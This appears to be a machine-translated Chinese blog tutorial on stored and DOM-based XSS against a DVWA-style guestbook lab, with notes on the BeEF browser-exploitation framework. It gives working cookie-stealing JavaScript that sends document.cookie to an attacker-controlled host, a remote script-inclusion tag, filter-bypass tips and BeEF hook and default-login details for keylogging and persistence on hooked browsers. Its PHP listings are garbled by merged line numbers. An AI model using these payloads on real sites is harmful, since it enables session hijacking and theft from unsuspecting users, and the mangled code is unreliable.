Little white Diary 49:kali penetration test Web penetration-XSS (iii)-storage-type XSS, Dom-type XSS, artifact Beff

Storage-type XSS and Dom-type XSS

"Principle of XSS"

Storage-Type XSS

1, can be long-term storage on the server side

2, each user access will be executed JS script, the attacker can only listen to the specified port

#攻击利用方法大体等于反射型xss利用

# #多出现在留言板等位置

* Recommended use of Burpsuite

A, observe the return results, whether to return the input data intact? Whether there are other labels

JS code is stored in the server through the message board, so each time you click on the message Board link, will pop up the XSS popup window

b, test load JS file in attacker-controlled server

#启动apache2 "Default listening on port 80"

A.js "Steal the client cookie information and upload it to the attacker-controlled server's PHP file"

1 var New Image (); 2 img.src = "http://192.168.56.102:88/cookies.php?cookie=" +document.cookie;

By default, the length of the client is limited, can be used burpsuite to bypass or directly modify the length of the HTML code limit "Security good, while the client and the server side of the length limit"

<script src= "Http://192.168.56.102/a.js" ></script>

# # #使用nc演示效果, listen for 88 ports, submit a success/Refresh page to successfully obtain cookies

Code Audit "The following code simply filters the input data"

Low

1<?PHP2 3 if(isset($_post[' Btnsign ']))4 {5 6    $message=Trim($_post[' Mtxmessage ']);7    $name=Trim($_post[' Txtname ']);8    9    //Sanitize Message InputTen    $message=stripslashes($message); One    $message=mysql_real_escape_string($message); A     -    //Sanitize Name Input -    $name=mysql_real_escape_string($name); the    -    $query= "INSERT into guestbook (comment,name) VALUES ('$message‘,‘$name‘);"; -     -    $result=mysql_query($query) or die(' <pre> '.Mysql_error() . ' </pre> ' ); +     - } +  A?>

Medium "Name input box output: Still a prototype, but the JS script is normal text (currently the ideal filter method);

1<?PHP2 3 if(isset($_post[' Btnsign ']))4 {5 6    $message=Trim($_post[' Mtxmessage ']);7    $name=Trim($_post[' Txtname ']);8    9    //Sanitize Message InputTen    $message=Trim(Strip_tags(addslashes($message)) ;//ADDSLASHS (): add backslash; Strip_tags (): Filters HTML tags; One    $message=mysql_real_escape_string($message); A    $message=Htmlspecialchars($message); HTML encoding,<> will be encoded -      -    //Sanitize Name Input the    $name=Str_replace(' <script> ', ',$name);//delete <script>,******** available split bypass -    $name=mysql_real_escape_string($name); -    -    $query= "INSERT into guestbook (comment,name) VALUES ('$message‘,‘$name‘);"; +     -    $result=mysql_query($query) or die(' <pre> '.Mysql_error() . ' </pre> ' ); +     A } at  -?>

High

1<?PHP2 3 if(isset($_post[' Btnsign ']))4 {5 6    $message=Trim($_post[' Mtxmessage ']);7    $name=Trim($_post[' Txtname ']);8    9    //Sanitize Message InputTen    $message=stripslashes($message); One    $message=mysql_real_escape_string($message); A    $message=Htmlspecialchars($message); -     -    //Sanitize Name Input the    $name=stripslashes($name); -    $name=mysql_real_escape_string($name);  -    $name=Htmlspecialchars($name); -    +    $query= "INSERT into guestbook (comment,name) VALUES ('$message‘,‘$name‘);"; -     +    $result=mysql_query($query) or die(' <pre> '.Mysql_error() . ' </pre> ' ); A     at } -  -?>

Dom-type XSS

A set of standard APIs that JS and other languages can invoke

#本质上跟反射型中利用src的方法一样, just calling the function is different.

<script>var img = document.createelement ("img"= "http://192.168.56.102:88/cookies.php?") Cookie= "+Escape (document.cookie); </script>

Beff

Beef is currently the most popular web framework attack platform in Europe and America, its full name is the Browser exploitation Framework project.

Can be used for build, interactive payload "contains a lot of modules, payload"

Ruby Writing

Server-side: Managing Hooked Clients

Client: JavaScript script running in the client browser

Browser Attack surface

Application is generally transferred to B/s architecture, browser becomes unified client program

Most require a social engineering approach to attack the browser

Attacking browser users

Use browser to attack other websites by injecting JS script

attack means

Exploit Web site XSS vulnerabilities for attack

Entice a client to access a bogus site containing hooked

Inject hooked script with man-in-the-middle attack

Common uses

Keyboard recorder

Network scan

Browser Information collection

Bind Shell

Integration with Metasploit

A, the default login account password Beff/beff

B, <script src= "Http://127.0.0.1:3000/hook.js" ></script>

C, module

1, Browser Browser type (can get cookie,os and other information)

"Click on the corresponding module can be used, the response speed is slow, green is applicable; Orange is also available, but will be found by client users; Red may not be available; Gray unknown is available"

2. Exploits exploit module

3. Network "can be used as a zombie machine"

4, Persistence when the page is closed (the host is not offline), can still operate on the hooked client "persistent hooked, it is recommended that when a host is compromised, do this immediately"

Little white Diary 49:kali penetration test Web penetration-XSS (iii)-storage-type XSS, Dom-type XSS, artifact Beff